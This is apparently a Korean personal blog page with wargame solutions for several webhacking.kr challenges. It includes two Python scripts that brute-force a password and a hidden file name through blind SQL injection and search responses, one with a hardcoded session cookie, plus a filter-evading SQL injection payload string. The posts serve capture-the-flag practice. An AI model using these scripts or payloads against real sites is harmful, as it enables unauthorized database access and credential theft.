Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/5 »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
 

'webhacking.kr'에 해당되는 글 4

  1. 2013.03.04 webhacking.kr 55번 문제 풀이
  2. 2013.03.04 webhacking.kr 9번 문제 풀이 1
  3. 2013.03.04 webhacking.kr 56번 문제 풀이 4
  4. 2013.03.04 webhacking.kr 40번 문제 풀이 6
 

webhacking.kr 55번 문제 풀이

Wargame | 2013. 3. 4. 02:10 | Posted by binaryU

import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/challenge/bonus/bonus-1/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password="4348414c4c454e47453535434c6561727e7e4b4b"

for j in range(21, 50):
   for i in range(32,127):
      ii=hex(i)
      iii=ii[2:4]
      print ii
      if i < 99999 or i > 96:
          url1="http://webhacking.kr/challenge/web/web-31/rank.php?score=0 and ip=0x6c6f63616c686f7374 and left(pAsSw0RdzzzZ,%d)=0x" %j
          url2="%s" %password
          url3=url1+url2+"%s" %iii
          print url3
          req=urllib2.Request(url3)
          req.add_header('Cookie',"notice=yes; PHPSESSID=0be9e96926e7403cbc78d8b72499be3d")
          read=urllib2.urlopen(req).read()
          ok = re.findall("localhost",read)
          if ok:
              password=password+"%s" %iii
              print password
              break


저작자표시

'Wargame' 카테고리의 다른 글

suninatas.com 8번 문제 풀이  (1) 2014.09.23
추천 워게임 사이트 써니나타스  (0) 2013.04.18
webhacking.kr 56번 문제 풀이  (4) 2013.03.04
webhacking.kr 40번 문제 풀이  (6) 2013.03.04
webhaking.kr 2번 문제 풀이  (2) 2012.12.15
:

webhacking.kr 9번 문제 풀이

Webhacking | 2013. 3. 4. 01:18 | Posted by binaryU

Apache HTTP Basic Authorization Bypass


bypass_apache_web_authorization.pdf


9번 문제는 일단 인증을 우회하고 들어간다음...


본격적으로 문제를 풀어야 하는데...


인증에서 부터 막히는 사람들이 꽤 많은것 같다...


그런 사람들은 위 pdf 문서를 먼저 참고하면 좋겠다.

저작자표시

'Webhacking' 카테고리의 다른 글

[PHP2EXE] PHP Compiler/Embedder 1.21  (0) 2013.03.04
.htaccess Attack Sample for PHP  (0) 2013.03.04
Mysql Table Name Search  (0) 2013.03.04
mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기  (0) 2013.03.04
아스키 코드표  (0) 2013.02.12
:

webhacking.kr 56번 문제 풀이

Wargame | 2013. 3. 4. 01:12 | Posted by binaryU

import urllib,urllib2,ClientCookie

params = urllib.urlencode({'id':"ID",
                           'pw':"PW"})

request = urllib2.Request("http://webhacking.kr/index.html", params)
response = ClientCookie.urlopen(request)
data = response.read()

pos = data.find("<!-- http://webhacking.kr/blog.php -->")

ch = ['/', '.', '0', '2', 'a', 'c', 'e', 'f', 'g', 'h', 'l', 'p', 'r', 't', 'w']

#0 2 a c e f g h l p r t w

answer = "w"

#<a href=?read=admin>readme

if pos > 0:
    print "Login Failed"
else:
    print "Login Success"
    for k in range(0, 32):
        for i in range(0, 14):
            paramsProblem = urllib.urlencode({'search':answer+ch[i]})
            print answer+ch[i]
            requestProblem = urllib2.Request("http://webhacking.kr/challenge/web/web-33/index.php", paramsProblem)
            responseProblem = ClientCookie.urlopen(requestProblem)
            dataProblem = responseProblem.read()
            posProblem = dataProblem.find("read=admin")
            if posProblem > 0:
                print ch[i]
                answer += ch[i]
                break
            else:
                print "trying : ", ch[i]
print answer

 

첨부파일을 C:\Python27\Lib\site-packages에 풀어 넣는다.

clientcookie.zip


저작자표시

'Wargame' 카테고리의 다른 글

suninatas.com 8번 문제 풀이  (1) 2014.09.23
추천 워게임 사이트 써니나타스  (0) 2013.04.18
webhacking.kr 55번 문제 풀이  (0) 2013.03.04
webhacking.kr 40번 문제 풀이  (6) 2013.03.04
webhaking.kr 2번 문제 풀이  (2) 2012.12.15
:

webhacking.kr 40번 문제 풀이

Wargame | 2013. 3. 4. 00:53 | Posted by binaryU

no=-1||id%09like%090x6125%26%26pw%09like%090x6625&id=a&pw=a

저작자표시

'Wargame' 카테고리의 다른 글

suninatas.com 8번 문제 풀이  (1) 2014.09.23
추천 워게임 사이트 써니나타스  (0) 2013.04.18
webhacking.kr 55번 문제 풀이  (0) 2013.03.04
webhacking.kr 56번 문제 풀이  (4) 2013.03.04
webhaking.kr 2번 문제 풀이  (2) 2012.12.15
:
 

티스토리툴바